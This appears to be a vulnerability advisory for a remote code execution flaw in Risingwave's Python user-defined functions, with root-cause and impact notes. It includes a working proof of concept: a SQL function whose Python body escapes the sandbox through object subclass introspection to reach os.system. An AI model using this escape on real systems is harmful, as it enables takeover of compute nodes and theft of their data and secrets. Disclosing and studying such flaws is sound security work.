An attacker with sufficient privileges to execute SQL queries can exploit a Remote Code Execution (RCE) vulnerability through User-Defined Functions (UDF) in Risingwave. By crafting a malicious UDF in Python, the attacker can execute arbitrary system commands on any compute nodes.
The root cause of this issue is the lack of proper isolation and sanitization in the execution environment for Python UDFs (https://github.com/arrow-udf/arrow-udf/blob/main/arrow-udf-python/src/interpreter.rs#L37-L73). Attackers can abuse this to escalate their privileges from SQL execution to direct system-level access.
Execute following SQL:
CREATE FUNCTION rce() RETURNS string LANGUAGE python AS $$
def rce():
os = [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"]
os.system('echo rce > ~/rce')
return "ok"
$$;
SELECT rce();Then, there shall be a rce file at home directory.
Attackers must have the privileges to execute SQL queries and create functions to exploit this vulnerability. By doing so, they can access arbitrary data and secrets stored on the compute node, effectively bypassing privilege boundaries. Additionally, attackers can execute arbitrary system commands, potentially leading to a system takeover. This significantly escalates the impact, as it compromises both data confidentiality and the overall integrity of the system.